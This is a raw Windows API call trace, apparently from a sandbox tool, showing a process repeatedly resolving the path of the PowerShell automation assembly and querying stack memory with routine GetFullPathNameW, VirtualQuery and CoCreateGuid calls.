	[0162.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.046] GetLastError () returned 0x0
	[0162.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.046] GetLastError () returned 0x0
	[0162.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.046] GetLastError () returned 0x0
	[0162.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.046] GetLastError () returned 0x0
	[0162.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.047] GetLastError () returned 0x0
	[0162.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.047] GetLastError () returned 0x0
	[0162.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.047] GetLastError () returned 0x0
	[0162.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.047] GetLastError () returned 0x0
	[0162.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.047] GetLastError () returned 0x0
	[0162.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.047] GetLastError () returned 0x0
	[0162.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.047] GetLastError () returned 0x0
	[0162.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.048] GetLastError () returned 0x0
	[0162.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.048] GetLastError () returned 0x0
	[0162.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcde30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.048] GetLastError () returned 0x0
	[0162.048] VirtualQuery (in: lpAddress=0xcd6c4, lpBuffer=0xce6c4, dwLength=0x1c | out: lpBuffer=0xce6c4*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce0b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.048] GetLastError () returned 0x0
	[0162.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.048] GetLastError () returned 0x0
	[0162.048] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce068, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.048] GetLastError () returned 0x0
	[0162.049] VirtualQuery (in: lpAddress=0xcd6c4, lpBuffer=0xce6c4, dwLength=0x1c | out: lpBuffer=0xce6c4*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.049] GetLastError () returned 0x0
	[0162.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.049] GetLastError () returned 0x0
	[0162.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.049] GetLastError () returned 0x0
	[0162.050] VirtualQuery (in: lpAddress=0xcd2f4, lpBuffer=0xce2f4, dwLength=0x1c | out: lpBuffer=0xce2f4*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.050] VirtualQuery (in: lpAddress=0xcd330, lpBuffer=0xce330, dwLength=0x1c | out: lpBuffer=0xce330*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.050] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.050] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.051] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.051] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.051] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.052] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.052] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.052] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.052] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.052] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.053] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.053] VirtualQuery (in: lpAddress=0xcd49c, lpBuffer=0xce49c, dwLength=0x1c | out: lpBuffer=0xce49c*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.053] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.053] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.054] VirtualQuery (in: lpAddress=0xcd5f8, lpBuffer=0xce5f8, dwLength=0x1c | out: lpBuffer=0xce5f8*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.054] VirtualQuery (in: lpAddress=0xcd634, lpBuffer=0xce634, dwLength=0x1c | out: lpBuffer=0xce634*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.054] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x3bad1b64, Data2=0x886e, Data3=0x45b6, Data4=([0]=0x85, [1]=0x96, [2]=0x82, [3]=0x80, [4]=0x38, [5]=0x26, [6]=0x3c, [7]=0xe6))) returned 0x0
	[0162.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.055] GetLastError () returned 0x0
	[0162.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.055] GetLastError () returned 0x0
	[0162.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.055] GetLastError () returned 0x0
	[0162.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.055] GetLastError () returned 0x0
	[0162.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.055] GetLastError () returned 0x0
	[0162.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.055] GetLastError () returned 0x0
	[0162.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.055] GetLastError () returned 0x0
	[0162.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.055] GetLastError () returned 0x0
	[0162.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.056] GetLastError () returned 0x0
	[0162.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.056] GetLastError () returned 0x0
	[0162.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.056] GetLastError () returned 0x0
	[0162.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.056] GetLastError () returned 0x0
	[0162.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.056] GetLastError () returned 0x0
	[0162.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.056] GetLastError () returned 0x0
	[0162.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.056] GetLastError () returned 0x0
	[0162.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.056] GetLastError () returned 0x0
	[0162.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.056] GetLastError () returned 0x0
	[0162.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.057] GetLastError () returned 0x0
	[0162.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.057] GetLastError () returned 0x0
	[0162.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.057] GetLastError () returned 0x0
	[0162.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.057] GetLastError () returned 0x0
	[0162.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.057] GetLastError () returned 0x0
	[0162.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.057] GetLastError () returned 0x0
	[0162.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.057] GetLastError () returned 0x0
	[0162.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.058] GetLastError () returned 0x0
	[0162.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.058] GetLastError () returned 0x0
	[0162.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.058] GetLastError () returned 0x0
	[0162.058] VirtualQuery (in: lpAddress=0xcd2f4, lpBuffer=0xce2f4, dwLength=0x1c | out: lpBuffer=0xce2f4*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.058] VirtualQuery (in: lpAddress=0xcd330, lpBuffer=0xce330, dwLength=0x1c | out: lpBuffer=0xce330*(BaseAddress=0xcd000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce0e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0162.059] GetLastError () returned 0x0
